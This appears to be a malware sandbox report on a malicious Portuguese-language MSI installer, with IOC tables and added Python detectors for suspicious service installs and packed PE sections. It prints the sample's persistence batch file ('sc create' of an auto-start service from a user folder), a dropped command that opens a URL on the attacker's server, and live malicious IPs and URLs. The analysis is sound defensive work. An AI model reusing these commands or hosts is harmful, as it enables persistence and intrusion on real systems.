Associated Sample Name / URL | Detection | Threat Name
CrzA2u67LQ.msi | malicious | Unknown

239.255.255.250 is the SSDP multicast address that every Windows host with network discovery enabled talks to, so its matches carry no attribution value. The 45.90.123.184 match is the meaningful one: CrzA2u67LQ.msi also shares this sample's windows10.exe and MSID686.tmp dropped files (see the Dropped Files context below), which points to the same distribution campaign.

Context: Domains
No context
Context: ASNs

Match DEDIPATH-LLCUS:
Associated Sample Name / URL | Detection | Threat Name | IP
Plata SWIFT 96127411.xls | malicious | Remcos | 103.124.107.228
bn.jar | malicious | Unknown | 185.255.114.28
https://thetechglitch.com/ | malicious | Unknown | 45.141.122.239
5klOcqqL2D.elf | malicious | Mirai | 161.8.26.215
skid.x86_64.elf | malicious | Mirai, Moobot | 45.12.142.171
CrzA2u67LQ.msi | malicious | Unknown | 45.90.123.184
UyWmCsMy4T.elf | malicious | Mirai | 45.12.141.82
lustsorelfar.exe | malicious | Unknown | 45.14.194.253
lustsorelfar.exe | malicious | Unknown | 45.14.194.253
SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe | malicious | PrivateLoader, PureLog Stealer | 185.228.19.37
Context: JA3 Fingerprints

Match 28a2c9bd18a11de089ef85a160da29e4 (every row below was matched on the same three IPs: 2.19.104.72, 40.68.123.157, 52.165.165.26):
Associated Sample Name / URL | Detection | Threat Name
https://www.qcc.com/web/cms/overseaApply?opsriskcountry=%E7%BE%8E%E5%9B%BD&ip=155.190.35.6&back=%2Fweblogin%3Fback%3D%2Ffirm%2F1ef8635d382a741aaca689243a486673.html | malicious | Unknown
file.exe | malicious | Unknown
https://m.exactag.com/ai.aspx?tc=d9177038bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atheannapolis250.org%2Fwinner%2F14136%2F%2FYnJhbndlbGwubW9mZmF0QGtwcy5jb20= | malicious | Unknown
file.exe | malicious | Amadey, Mars Stealer, Stealc, Vidar
https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fyourremittance.com.au%2ft%2fs%2fUD5xw4r&umid=cc04381d-8482-4529-83d6-e97329962ac3&auth=3a5566c60b1f4d8525fa8ab109f94675a663eb25-bbc82991079aa7c5d0d2ec918ad27ef8f965c70a | malicious | Unknown
file.exe | malicious | Unknown
https://cdn.polyfill.io/ | malicious | Unknown
https://googie-anaiytics.com | malicious | Unknown
https://promoboxxinc-my.sharepoint.com/:o:/g/personal/mark_ruthfield_promoboxx_com/EhhP0_qQ-pRNnHIIvk85j7YBGabYCjE3lQP2M5rir-Tkwg?e=5%3a9mx4QX&at=9&xsdata=MDV8MDJ8YWNoYW50bGVyQHNldmVuLmNvbS5hdXxhYjcxZTkyMmVhZWM0NzA2OWUyMDA4ZGM5YmNjN2EyNHxiMzU5MjkxMjQxNTU0Mzk5Yjc5MDc1MmM4OTRkMjkzNXwwfDB8NjM4NTU2NTQ5NzMyMDQ2Nzk5fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=MVpGSnd1NWxrcmZ3SkpKc0RENHZCWFQvVTVHTTJSUWlFQXdUaGZONlRuYz0%3d | malicious | HTMLPhisher
file.exe | malicious | Unknown

A JA3 hash identifies the TLS client stack, not the sample. The only TLS connections in the behavior graph are made by chrome.exe, so this fingerprint most likely belongs to the analysis VM's browser build, which is why it co-occurs with unrelated phishing and stealer samples; treat these matches as noise.
Context: Dropped Files

Match C:\Users\user\Pictures\fotosdaviagem\windows10.exe:
Associated Sample Name / URL | Detection | Threat Name
NF_e_07_2024_XML__.msi | malicious | Unknown
CrzA2u67LQ.msi | malicious | Unknown
z1Pedido-Faturado-NF-938731.cmd | malicious | Unknown
arquivo.msi | malicious | Unknown
z1Intimacao-eletronica.msi | malicious | Unknown
Nota.msi | malicious | Unknown

Match C:\Windows\Installer\MSID686.tmp:
Associated Sample Name / URL | Detection | Threat Name
CrzA2u67LQ.msi | malicious | Unknown
HomeDesk.msi | malicious | Unknown
z1Pedido-Faturado-NF-938731.cmd | malicious | Unknown
arquivo.msi | malicious | Unknown
25690.01808D.msi | malicious | Unknown
fatKCMAGKKH.msi | malicious | Unknown
SPMServer_2024.3.5.473.exe | malicious | Unknown
SPMServer_2024.2.1.7.exe | malicious | Unknown
SPMServer_2024.3.1.22.exe | malicious | Unknown
Df.mes-25664.msi | malicious | Unknown

The windows10.exe matches are the useful pivot: the associated sample names are Brazilian Portuguese lures (NF-e, the electronic invoice; "Pedido-Faturado-NF", an invoiced order; "Intimacao-eletronica", an electronic court summons; "Nota", an invoice; "arquivo", file), consistent with the Portuguese strings in this sample's own installer and batch file. MSID686.tmp is a weaker indicator: it scores 0% and 1% with the scanners above and also turns up in the SPMServer_*.exe installers, so it is likely a generic MSI custom-action helper shared by many installers rather than campaign-specific code.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):9582
                                                                    Entropy (8bit):5.549730100561323
                                                                    Encrypted:false
                                                                    SSDEEP:96:QwnCAAQlZ/RdLc3Yl6MoJmlRERT4g5HN+1pd+raR9mK2TUdBFjQbLe5ubi8I8Kw1:Q8CfqdOCetZ2fHkEodiMH
                                                                    MD5:C1E4C37FD8D757BB1AC90AD449E3C483
                                                                    SHA1:46B939B2DF15A5318BD72608DD1D03AEE792C6CC
                                                                    SHA-256:1DF09731DED4FDC2F1FF39E88CB1A7CB5661CBC02144FCF7A51F8B9F873BE904
                                                                    SHA-512:0F7190C3F16BF6846CCF5B64E0EB7795A07D3183951C632CE14AA22F0FAB82C5890A5F53336C219D857B8CBB9014BADA3C5018B17A09C920F29C9027F9BAD57E
                                                                    Malicious:false
                                                                    Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}..Aplicativo Windows..hBqTrQLya4.msi.@.....@?....@.....@........&.{32FF458D-4EB8-49EA-9D5C-9471CB31AE21}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{4669957E-4874-4408-AF9D-19502B394F45}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{7FA89396-444D-4152-8B48-A5E58414D67B}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{1A182076-3D9
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):249926
                                                                    Entropy (8bit):3.803039078905188
                                                                    Encrypted:false
                                                                    SSDEEP:1536:yxqvZFe7Iq/8z8VDh5SYVQheG6Wr5vbpRYpJhJa2pQt2xp/RPHBK2Pp3pRpMWpP8:qI+QBZVjacxlV86xncpRj4ICWZW
                                                                    MD5:921AC580EF1AB59F47321CEE17A646B2
                                                                    SHA1:040BFB4B6C7CACFAD17B7B1ADE6D6A4441808186
                                                                    SHA-256:517CA669EC5BF920E14682FD95D27A19869182008CCAC4656689142BD7A9BD82
                                                                    SHA-512:27539AB4039131B8383AEDEC5964B4445A9E63B1C7CA2B37829F3762980093C2FF4464B4735D23E5EB5503E39167FCEF7FEB2E53201465BB57C1AF2A360BD99A
                                                                    Malicious:false
                                                                    Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.4./.0.7./.2.0.2.4. . .0.3.:.1.3.:.0.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.4.0.:.7.8.). .[.0.3.:.1.3.:.0.7.:.7.9.5.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.4.0.:.7.8.). .[.0.3.:.1.3.:.0.7.:.7.9.5.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.4.0.:.4.0.). .[.0.3.:.1.3.:.0.7.:.8.4.2.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.4.0.:.4.0.). .[.0.3.:.1.3.:.0.7.:.8.4.2.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):196
                                                                    Entropy (8bit):4.891201943788933
                                                                    Encrypted:false
                                                                    SSDEEP:3:mKDDktbrXj18BIDQK1ERNLw2ABOA53kfNINAgAEFWREX6EEDQobhL3T18BQQUT+:hwFDJRku4NfIOc/Q3RVPRbj5QZ
                                                                    MD5:1951A22DD00589B9D64F27075C96188B
                                                                    SHA1:4CBEDB39A682D217EA63693346D337E032B85A28
                                                                    SHA-256:F1560195A61B8DFB6FDCA79B328F2D221187EFA8932DC9A4232C317BF8151292
                                                                    SHA-512:41E39FEE27A854C0F68CC70633F4CF51131E5EB15CE693DB3E6CA90321E32B836E9497A111965AB20B65BFBF68CF5CCEB28D14073EBB2DBA7D1C9258BC55E084
                                                                    Malicious:false
                                                                    Preview:@echo off..REM --- Criar o servi.o ---..sc create MeuServico binPath= "%USERPROFILE%\Pictures\fotosdaviagem\windows10.exe" start= auto..REM --- Iniciar o servi.o ---..sc start MeuServico....exit
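The batch file previewed above (the REM comments read "Create the service" and "Start the service") registers windows10.exe from the user's Pictures folder as an auto-start service named MeuServico and starts it; the two sc.exe children of cmd.exe in the behavior graph correspond to those two commands. Because cmd.exe expands %USERPROFILE% before sc.exe runs, the registered ImagePath is the literal C:\Users\<user>\Pictures\fotosdaviagem\windows10.exe, and the service then runs a user-writable binary as LocalSystem (the sc create default). That is the detection hook: legitimate services almost never install their image under a user profile. The following Python is an added example, not part of the Joe Sandbox report or of the sample. Its input records are constructed: the sc create command line as a Sysmon Event ID 1 or Security 4688 CommandLine field would capture it, the System log Event ID 7045 message the Service Control Manager writes on install (real field labels, constructed values), and a benign install for contrast.

```python
"""Flag service installations whose image lives in a user-writable location.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Input records are constructed: an 'sc create' command line like the one in the
dropped batch file (as Sysmon EID 1 / Security 4688 would record it) and a
System log Event ID 7045 message with the Service Control Manager's field
labels, plus a benign install for contrast.
"""
import re

# Directories an unprivileged user can write to. Legitimate services almost
# never install their image there, so a match is a strong hunting lead.
USER_WRITABLE_VARS = ("%USERPROFILE%", "%APPDATA%", "%LOCALAPPDATA%",
                      "%TEMP%", "%TMP%", "%PUBLIC%")
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# sc.exe syntax: sc [\\server] create <name> binPath= "<path>" [start= auto ...]
# (sc.exe requires the space after 'binPath='; the regex tolerates its absence).
_SC_CREATE = re.compile(
    r"\bsc(?:\.exe)?\s+(?:\\\\\S+\s+)?create\s+(?P<name>\S+)\s+.*?"
    r"binpath=\s*(?:\"(?P<quoted>[^\"]+)\"|(?P<bare>\S+))",
    re.IGNORECASE)

# 'Key:  value' lines of an Event ID 7045 message body.
_EVENT_FIELD = re.compile(r"^(?P<key>[A-Za-z ]+):\s+(?P<val>.+?)\s*$", re.MULTILINE)


def parse_sc_create(cmdline):
    """Return (service_name, binpath) from an 'sc create' command line, else None."""
    m = _SC_CREATE.search(cmdline)
    if m is None:
        return None
    return m.group("name"), (m.group("quoted") or m.group("bare"))


def parse_eid7045(message):
    """Return (service_name, image_path) from a 7045 'A service was installed' message, else None."""
    fields = {k.strip().lower(): v for k, v in _EVENT_FIELD.findall(message)}
    if "service name" not in fields or "service file name" not in fields:
        return None
    image = fields["service file name"]
    # 'Service File Name' may be quoted and may carry arguments; keep the image only.
    if image.startswith('"'):
        image = image[1:].split('"', 1)[0]
    else:
        image = image.split(" ", 1)[0]
    return fields["service name"], image


def is_user_writable(path):
    """True if a service image path points into a user-writable location."""
    p = path.strip().strip('"').replace("/", "\\")
    if p.upper().startswith(USER_WRITABLE_VARS):
        return True          # unexpanded variable: always a user-controlled location
    return p.lower().startswith(USER_WRITABLE_PREFIXES)


def scan(records):
    """records: iterable of (kind, text) with kind 'cmdline' or 'eid7045'.
    Returns one finding dict per suspicious service install."""
    findings = []
    for kind, text in records:
        parsed = parse_sc_create(text) if kind == "cmdline" else parse_eid7045(text)
        if parsed is None:
            continue
        name, image = parsed
        if is_user_writable(image):
            findings.append({"kind": kind, "service": name, "image": image,
                             "reason": "service image in user-writable location"})
    return findings


# Constructed sample records (not taken from the report).
SAMPLE_RECORDS = [
    ("cmdline", 'sc create MeuServico binPath= '
                '"%USERPROFILE%\\Pictures\\fotosdaviagem\\windows10.exe" start= auto'),
    ("cmdline", "sc start MeuServico"),                      # not an install: ignored
    ("eid7045",
     "A service was installed in the system.\n\n"
     "Service Name:  MeuServico\n"
     'Service File Name:  "C:\\Users\\user\\Pictures\\fotosdaviagem\\windows10.exe"\n'
     "Service Type:  user mode service\n"
     "Service Start Type:  auto start\n"
     "Service Account:  LocalSystem\n"),
    ("eid7045",                                              # benign: under Program Files
     "A service was installed in the system.\n\n"
     "Service Name:  VendorAgent\n"
     'Service File Name:  "C:\\Program Files\\Vendor\\agent.exe" --service\n'
     "Service Type:  user mode service\n"
     "Service Start Type:  auto start\n"
     "Service Account:  LocalSystem\n"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

Run against the constructed records it reports MeuServico twice (once from the command line, once from the 7045 event) and stays silent on the Program Files install. In production the same two parsers would be fed from Sysmon/4688 command lines and the System log respectively; checking both sources matters because the command line shows the unexpanded %USERPROFILE% while the SCM event shows the path actually registered.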
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):13055488
                                                                    Entropy (8bit):7.959489535522271
                                                                    Encrypted:false
                                                                    SSDEEP:196608:SAoi2diILpItfMCl5gZrcAh8yIFYGUeCnNOSunnTDt0qZ5nRHT4Aw7oMPsl5+4f9:nqEtfnFVDcIDnHD5RH8rJPA5f1
                                                                    MD5:1120F08674501BA801FC27AB40E4A25E
                                                                    SHA1:6E98C6ACAF47875996743A787CF763E163926C60
                                                                    SHA-256:55EFA31F8FCC414F08CB0B2F3598C05896315F956F1ECB7C61908A0B60100949
                                                                    SHA-512:795C58DA3CBE8944B086BDEB369978C9899E4AA924A9F7B10801E184005A581D84D0AF14DFA0917BE81D0BE05CA0B3684C9909D228ECD788BA858D316E0D4D01
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                    • Antivirus: Virustotal, Detection: 43%, Browse
                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....FQd..................-..........T........-...@...........................g.....................................h..&-...........f.......................f......................................................................................text.....-......................... ..`.itext........-..................... ..`.data....x....-.....................@....bss.....X...@...........................idata..`8..........................@....didata.l...........................@....edata..&-..........................@..@.rdata..E.... /.....................@..@.ri$....rbp..0/..................... ..`.)5y................................@....kC0.....!.......".................. ..`.rsrc.........f......(..............@..@.reloc........f.....................@..B..................... 4......n3.............@..@........................................................
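The PE32 DLL previewed above (its 50% ReversingLabs / 43% Virustotal scores are the ones listed for C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll in the antivirus table) carries the "This program must be run under Win32" stub and the .itext/.didata sections typical of Delphi-built binaries, but the section table also shows names that no compiler emits: `.ri$` followed by unprintable bytes, `.)5y` and `.kC0`. Such names are a cheap, reliable hint that a packer or protector rewrote the image, which is what section-name signatures key on. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: it walks a PE section table from raw bytes and flags odd names, writable-and-executable sections and executable sections with no bytes on disk. The image it analyses is constructed in the block (headers only, no code) with section names mirroring the legible ones in the preview; it is not the dropped DLL.

```python
"""Walk a PE section table and flag section names and flags that packers
and protectors tend to leave behind.

Added example, not part of the Joe Sandbox report and not code from the
analysed sample. The image built below is a constructed, headers-only PE32
whose section names mirror the ones legible in the preview above; it is not
the dropped DLL itself.
"""
import string
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Section names emitted by mainstream toolchains (MSVC, MinGW, Delphi/Borland).
KNOWN_SECTION_NAMES = {
    ".text", ".itext", ".data", ".rdata", ".bss", ".idata", ".didata", ".edata",
    ".rsrc", ".reloc", ".tls", ".pdata", ".xdata", ".CRT", ".debug",
}
NAME_ALLOWED_CHARS = set(string.ascii_letters + string.digits + "._$@")


def parse_sections(image):
    """Return [(name, virtual_size, raw_size, characteristics), ...] for a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size          # section table follows the optional header
    sections = []
    for i in range(nsections):
        # IMAGE_SECTION_HEADER (40 bytes): Name[8], VirtualSize, VirtualAddress,
        # SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
        # NumberOfRelocations, NumberOfLinenumbers, Characteristics
        raw_name, vsize, _, rsize, _, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, table + i * 40)
        sections.append((raw_name.rstrip(b"\0").decode("latin-1"), vsize, rsize, chars))
    return sections


def section_findings(image):
    """Return [(section_name, reason), ...] for sections that deserve a closer look."""
    findings = []
    for name, vsize, rsize, chars in parse_sections(image):
        if any(c not in NAME_ALLOWED_CHARS for c in name):
            findings.append((name, "special characters in section name"))
        elif name not in KNOWN_SECTION_NAMES:
            findings.append((name, "non-standard section name"))
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append((name, "section is both writable and executable"))
        if chars & IMAGE_SCN_MEM_EXECUTE and vsize > 0 and rsize == 0:
            findings.append((name, "executable section with no bytes on disk (filled at runtime)"))
    return findings


def build_test_image(section_specs):
    """Construct a minimal, headers-only PE32 image from
    (name, virtual_size, raw_size, characteristics) tuples. Test data only."""
    e_lfanew = 0x40
    dos_stub = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                        # PE32 optional header; contents unused here
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0, opt_size, 0x2102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\0"),
                    vsize, 0x1000 * (i + 1), rsize, 0, 0, 0, 0, 0, chars)
        for i, (name, vsize, rsize, chars) in enumerate(section_specs))
    return dos_stub + b"PE\0\0" + coff + b"\0" * opt_size + table


# Constructed section list mirroring the preview: the Delphi set plus three odd names.
SAMPLE_SECTIONS = [
    (".text",   0x2D0000, 0x2D0000, 0x60000020),   # code | execute | read
    (".itext",  0x1000,   0x1000,   0x60000020),
    (".data",   0x7800,   0x7800,   0xC0000040),   # initialized data | read | write
    (".bss",    0x5800,   0,        0xC0000080),   # uninitialized: no raw bytes is normal
    (".idata",  0x3860,   0x3860,   0x40000040),
    (".didata", 0x6C0,    0x6C0,    0x40000040),
    (".edata",  0x2D26,   0x2D26,   0x40000040),
    (".rdata",  0x45,     0x45,     0x40000040),
    (".ri$",    0x10000,  0x10000,  0x60000020),
    (".)5y",    0x10000,  0,        0xE0000020),   # code | execute | read | write, no raw data
    (".kC0",    0x100,    0x100,    0x60000020),
    (".rsrc",   0x4000,   0x4000,   0x40000040),
    (".reloc",  0x1000,   0x1000,   0x42000040),   # initialized | discardable | read
]

if __name__ == "__main__":
    for name, reason in section_findings(build_test_image(SAMPLE_SECTIONS)):
        print(f"{name!r}: {reason}")
```

On the constructed image the walk reports the three odd names and, for the RWX section with no raw data, the two flag-based findings as well; the ordinary Delphi sections, including .bss (which legitimately has no bytes on disk but is not executable), produce nothing. Point `parse_sections` at real file bytes to apply the same checks to a dropped sample; expect section-name allowlists to need tuning for code signed by less common toolchains.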
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16156854
                                                                    Entropy (8bit):7.999987454770361
                                                                    Encrypted:true
                                                                    SSDEEP:393216:b3jVMSUmx4twho2HfoWAN+d+Gstcdq5Z92/72X4o/o:LjGo4tMfFItcUn92xo/o
                                                                    MD5:697FF336A8F1278BEBD9FA3358BAE2BA
                                                                    SHA1:39514D8961C976B25E803A8EDF65AF1928D2CD2E
                                                                    SHA-256:918DE41CB24F5BE5A473B2D0881FEE5D56869640742F37466CBCAF5FD154E9CE
                                                                    SHA-512:32F943FEA634E6FB0C0B2D4E934FC671838611CEB9068840C6E7CE99036E06BE94E88B38256AC57729DF1983E0B5DC1474F7458CA32EF371B0D84077656FBDAF
                                                                    Malicious:false
                                                                    Preview:r/.fn...W.k........W.&r..r}.....B.N......N8..#.%..s..\A?.(am.|..x).....=.3}SzIU..9.R...Q.V....'.f-^..@..... .e\l7..[%.]r..N\....9.z.V...}o....I.....?B......e%.=...x.@..+U..4.U..R...j(b..9...C.o.#U.w..U!F.18......M]......D..*'Zx....n3.....Ql..U=B..,..q/..0mC...~..n....:..4. /.@.$...q|..>.fd3.u.E.X..I.........T.............s@..[/f.x:^..F*..?.).}pnx._..=...n......J..{x7...Z!F.hat....@4g.<..!=..Q9..F.E5...V~.B.1$...\.``=....;A...#.ab.3#ZA%.....S.<".@@T(@H.0.a..G`B..o..{$a1.%_......x.Q..)C....^.r..%i.,O\r..#...a.p....<...N...!6.4.r..Is.W.(..:6..........St..(..%...C..f`ZR..+.zK....."d..FwL..TR...]8.9...3.HX>;@m.v&+'.....r.)*...`n.Z...."..7;.N........wJ.*1....g..........V."....(7u.M..,o..z.R.&..w.v4.U./..V.b.\.o.z.M.i7.L.e...,U.S+.v6.P...`.w .PB.f.......j..,.:.C\...Fc..:...`:=.X......26.......G^..l.`..f.....[...x...6...v....Y.c..M.U..]k..1..).&...@...].bf.....@. .pZ.0.(.}...k...1.....:.d]L../.~.V>|qQ..t.5.>I#..>....<l...g..@]...k9kF.,!.."%h...z
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):54
                                                                    Entropy (8bit):5.245447224305563
                                                                    Encrypted:false
                                                                    SSDEEP:3:3ugfKvpkPxBKS9Gr236TOf:+giveJr9Upg
                                                                    MD5:51C2C6285991EF6126010B102782B43D
                                                                    SHA1:9CAEC981404A3BAD4536CB42DE557EB1CFECB085
                                                                    SHA-256:3692E5F68D8F5D3A8A3782FAAC232D89C74E37ED8E9EF2853AEE0147E4D2659C
                                                                    SHA-512:9C99EE675E9D3F9320DEFF79F23B062B2E563C5E1824089DA4825F25E8F8A87E0E870758EDAA4610C78F850EA2355886CE5F30DE51C1536F8713E9045999D48E
                                                                    Malicious:false
                                                                    Preview:jn8r4IjEzoJLa1cjTx5vc2C9Sk3Ff7+76/nuToKOtShN..oKPv+W/D
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):53
                                                                    Entropy (8bit):4.461516388926147
                                                                    Encrypted:false
                                                                    SSDEEP:3:jhRFLVUdxyVY1QVn:jHFydxyVY1QV
                                                                    MD5:79F4017D8256FDFB1D7FA719A0CB4771
                                                                    SHA1:73ACD3CC6353ECFF615BB8BE2FB1B8D28BD0BF12
                                                                    SHA-256:BDAA787D67F8B4B80B1D271C2D6AB4D6ACC1C05DF309D5EFDDFB3D0D4DB93A0F
                                                                    SHA-512:350ED557950074CAD51412D05D755771137BBC83400B1C28997559F6023F91B0A3C953E6B6E52BB6264566AD078AA0B3A0B41B3D3CAF9745513156138CB61E5B
                                                                    Malicious:false
                                                                    Preview:Start http://45.90.123.184/clientes/inspecionando.php
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1793
                                                                    Entropy (8bit):7.888051089019235
                                                                    Encrypted:false
                                                                    SSDEEP:48:PCSBPCF4qYtOIt9Oxi0/1YapmAg7VZNPVs:PvCFxYzmxN3mAYNS
                                                                    MD5:FEBE516EE835A50D940B2413596527C4
                                                                    SHA1:E38B8178C37973A7E43F1EE183F08FCFFFAEC5AC
                                                                    SHA-256:2E62CCA2526CD1355D85F607DCD274F05C808DB6AD9FCA42DC9371A30DB52652
                                                                    SHA-512:C719989A043475CFC1CDF3EBAE5E27DC721F025279F7EB3F3E1FA52D1A0F440214F77986EC4D18BFE1FFC6905C512198DBA0A0299D1FE7EDA66BD0E7205E772F
                                                                    Malicious:false
                                                                    Preview:..5....\..).X.rBA..F..3^,..p.U%#O.5....q.a..U.G.......o....5...*....&O.:....T..z...d.....[.....k.8S....0..{W$HP.b2&E....u..x..,l[T.0]..Q.[*..X_,7`...m.@....@...u....r..E....P.:[.{.\.X..&>..r._ue..Y.......^....x... 4\.u.....D-...v.z.M...1.q..j.....9*a'...Y..fL)...,442$pw .|7mu....$.s..od..Bl.....@...qo.#.....n.!.I....*B.a.DA...sv.>.;..$D....`c....TiI%.-..h.>..6}]e..7..y?.5...10W13.,]&^U\.O.).a.9.s..).4*.h...LV..z9..0...F.M......S{..~.rki....Q..&.#.f3....Ob......(...m...B.Q...m.p..W....zj.=..J.6.8....t..6.......R.,m...<(m.J....1.....g...j..a........,.._....P...t.....K..|~D.%.8.zLC{...P.....{W.U..z:.k........U..D@....Q....T.V....p..Mo..B.)#.'...nu:..o....o..H..j.X.........6... (wq.K. ..K.@.....I.fK..a.4..P.wcS.... .b..'C7....ha..3.S..(.fH'.(.Jj.;...Wq8..c........7.{.7.E..-l.t.!.P.6..&:...r7.-z...|Pm.8.6.~..L..r.Z.A.o*Q......@.L...q.2 %..f.G.^...S...A/.Q.n..Rq..".VQG!..n..[:X>..5....v.L.c..zc.F.Y.p..m..>.+9..G...,g6.U..;B)..Mp.....H?F....k.\.co|....
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1626280
                                                                    Entropy (8bit):7.371352775782398
                                                                    Encrypted:false
                                                                    SSDEEP:49152:H4jyNKd2Bqc8Y7IDbauSVGDzhGjThGDzhmj8L5NsmK2:H4Fd2Bqc8Y7IDbauSVGDzhGjThGDzhmL
                                                                    MD5:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    SHA1:CF1BEEEC71ABBFBE8A6F47ABAAA6C1AF2FEE37DC
                                                                    SHA-256:585741CA3C4041BB39D107F1F159D908650967FBCCAC3A491BCA389CC4BA0769
                                                                    SHA-512:AEAF1D2DA43584AE91EA032C59A945AB91F721CC3B5BB98C2C7096DFD8C728B4EBF735491E06E934B4B1C9F1CCC719F950AD6F45E212F638B52C7AF5EFCC18DB
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                    • Antivirus: Virustotal, Detection: 5%
                                                                    Joe Sandbox View:
                                                                    • Filename: NF_e_07_2024_XML__.msi, Detection: malicious
                                                                    • Filename: CrzA2u67LQ.msi, Detection: malicious
                                                                    • Filename: z1Pedido-Faturado-NF-938731.cmd, Detection: malicious
                                                                    • Filename: arquivo.msi, Detection: malicious
                                                                    • Filename: z1Intimacao-eletronica.msi, Detection: malicious
                                                                    • Filename: Nota.msi, Detection: malicious
